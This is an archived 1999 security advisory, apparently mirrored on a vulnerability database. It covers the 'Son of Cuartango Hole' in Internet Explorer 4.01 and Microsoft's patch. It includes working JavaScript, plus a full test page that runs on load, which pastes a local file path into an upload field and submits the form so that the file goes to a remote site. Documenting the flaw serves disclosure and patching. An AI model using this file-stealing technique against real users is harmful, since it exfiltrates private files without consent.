Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

cuartango-son.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Cuartango Hole exploits untrusted scripted paste in Internet Explorer; fix available from Microsoft.

Code
`The Son of Cuartango Hole   
  
http://pages.whowhere.com/computers/cuartangojc/son1.html  
  
Affected software  
Microsoft Internet Explorer 4.01  
  
Fixes  
Microsoft has released a fix : Microsoft Security Site   
http://www.microsoft.com/security/bulletins/ms98-015.asp  
Microsoft names the vulnerability as "Untrusted Scripted Paste".   
They have created a new USP patch.  
  
Technical description  
  
There is an input form field used to tranfer files from the browsing computer to a WEB site this  
input field is HTML coded as :  
  
<input type="file" name="filename" size="30">  
  
Theoretically this input field can be filled only by the user by clicking a "Browse" button or  
typing the file name.  
In order to avoid a security hole, script files are not allowed to modify the value of this  
input field, the sentence bellow will not work :  
  
document.forms[0].filename = "C:\config.sys";  
  
The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file  
name on the input field, Microsoft's old USP patch fixed this single "copy and paste"  
vulnerability.  
There is a workaround making the "paste" operation work again. The idea is : create a "textrange"  
object with the selection of the file input and then paste over this "textrange" object.   
  
The code below is a bit more sophisticated than the "Cuartango Hole" code :  
  
T1 is a hidden input field defined in a second form containing the file pathname to be copied to  
the clipboard.  
  
  
<body onload="getfile()">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
var rng = document.selection.createRange();  
rng.execCommand("paste");  
document.forms[0].submit();  
}  
  
The result is that the file is POSTED to the malicious WEB site defined in the form action  
property.  
A similar code will also work inside an HTML formatted e-mail.   
  
The Cuartango Hole code was very similar :  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
document.forms[0].submit();  
}  
  
  
  
Example Exploit  
  
<html>  
  
<head>  
<meta name="keywords"  
content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">  
<title>Son of Cuartango Hole Test</title>  
<bgsound src="images/gallarda.mid" loop="-1">  
</head>  
  
<body onload="getfile()">  
<script language="JavaScript">  
  
function getfile()  
{  
document.forms[0].filename.select(); // onload="getfile()"  
var rng = document.selection.createRange();  
document.forms[1].T1.select();  
document.execCommand("copy");  
rng.execCommand("paste");  
if(document.forms[0].filename.value == "")  
alert("Your browser does not have the security hole");  
else  
alert("Security hole in browser -- " + navigator.userAgent );  
}  
  
</script>  
  
  
<p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big><small></p>  
</small>  
  
<p align="center">&nbsp;</p>  
<small>  
  
<form enctype="multipart/form-data" method="post"  
action="http://www.angelfire.com/cgi-bin/bedit">  
<div align="center"><center><p><strong>This is a test to verify if you are affected by the  
Son of Cuartango Hole</strong>.<br>  
<strong>If file name (/test.txt) is made visible in the box below then you are effected.</strong></p>  
</center></div><div align="center"><center><p>&nbsp;<input type="file" name="filename"  
size="15"></p>  
</center></div>  
</form>  
  
<form method="POST">  
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>  
</form>  
</small>  
  
<p align="center"><font size="3" color="#0000FF"><a  
  
href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of  
Cuartango Hole page</strong></a></font></p>  
  
<p align="center">&nbsp;&nbsp;&nbsp; <a href="mailto:[email protected]">Juan  
Carlos García Cuartango</a></p>  
  
<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>  
</small></font></p>  
  
<p><font size="2" face="Garamond">Last update&nbsp;1998&nbsp; Nov 15 Año del Señor de  
1998 </font></p>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
cuartango holeinternet explorer vulnerabilityuntrusted scripted pastemicrosoft fixhtml input fieldsecurity patch.
22